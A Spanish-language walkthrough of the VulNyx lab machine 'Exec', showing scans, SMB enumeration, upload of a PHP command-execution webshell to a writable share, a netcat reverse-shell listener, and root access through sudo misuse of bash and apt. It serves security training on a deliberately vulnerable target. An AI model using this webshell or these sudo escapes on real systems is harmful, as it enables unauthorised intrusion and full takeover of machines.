Exec es una máquina Linux de dificultad baja de la plataforma VulNyx, creada por s3cur4 y funciona correctamente en VirtualBox.
Skills:
- SMB Enumeration
- Remote Code Execution (RCE)
- Misconfigured
- Sudo
Nmap
❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 11:41 CEST
Nmap scan report for 192.168.1.74
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:DF:32:61 (Oracle VirtualBox virtual NIC)
❯ nmap -sVC -p22,80,139,445 192.168.1.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 11:41 CEST
Nmap scan report for 192.168.1.74
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:DF:32:61 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -2s
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-04-20T09:42:09
|_ start_date: N/A
22 ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80 http Apache httpd 2.4.57 ((Debian))
139 netbios-ssn Samba smbd 4.6.2
445 netbios-ssn Samba smbd 4.6.2
Port: 80 (HTTP)
realizo fuzzing en busca de posibles rutas/archivos sin éxito
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.74/' -x 'html,txt,php'
/server-status (Status: 403) [Size: 277]
Port: 445 (SMB)
Enum Shares (Guest)
encuentro el recurso server
con permisos READ/WRITE
❯ smbclient -NL 192.168.1.74
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
server Disk Developer Directory
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
❯ smbmap --no-banner -H 192.168.1.74
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.1.74:445 Name: 192.168.1.74 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
server READ, WRITE Developer Directory
IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)
nobody NO ACCESS Home Directories
dentro de server
existe un index.html
, por lo que se puede suponer que el directorio de samba es el mismo que el del servidor HTTP
❯ smbclient //192.168.1.74/server
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 20 11:50:36 2024
.. D 0 Mon Apr 15 10:04:12 2024
index.html N 10701 Mon Apr 15 10:04:31 2024
subo con PUT
una webshell con código PHP y obtengo éxito
❯ echo -n '<?php system($_GET["cmd"]); ?>' > cmd.php
❯ smbclient //192.168.1.74/server
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put cmd.php
putting file cmd.php as \cmd.php (14.6 kb/s) (average 14.6 kb/s)
consigo ejecutar comandos como usuario www-data
ya ejecutando comandos intento obtener una reverse shell
obtengo la shell como www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.67] from (UNKNOWN) [192.168.1.74] 51898
id;hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exec
User Pivoting (www-data > s3cur4)
www-data
puede ejecutar como s3cur4
el binario bash
con sudo
www-data@exec:/$ sudo -l
Matching Defaults entries for www-data on exec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on exec:
(s3cur4) NOPASSWD: /usr/bin/bash
me convierto en usuario s3cur4
abusando del privilegio
www-data@exec:/$ sudo -u s3cur4 /usr/bin/bash -i
s3cur4@exec:/$ id
uid=1000(s3cur4) gid=1000(s3cur4) groups=1000(s3cur4)
Privilege Escalation
s3cur4
puede ejecutar como root
el binario apt
con sudo
s3cur4@exec:~$ sudo -l
Matching Defaults entries for s3cur4 on exec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User s3cur4 may run the following commands on exec:
(root) NOPASSWD: /usr/bin/apt
en GTFOBins nos dan el one liner para escapar una shell
me convierto en usuario root
abusando del privilegio
s3cur4@exec:~$ sudo -u root /usr/bin/apt changelog apt
root@exec:~# id
uid=0(root) gid=0(root) groups=0(root)
ya como usuario root
puedo leer las flags user.txt
y root.txt
root@exec:~# find / -name user.txt -o -name root.txt |xargs cat
97d8add*************************
45e398c*************************
hasta aquí la máquina Exec.
Happy Hacking!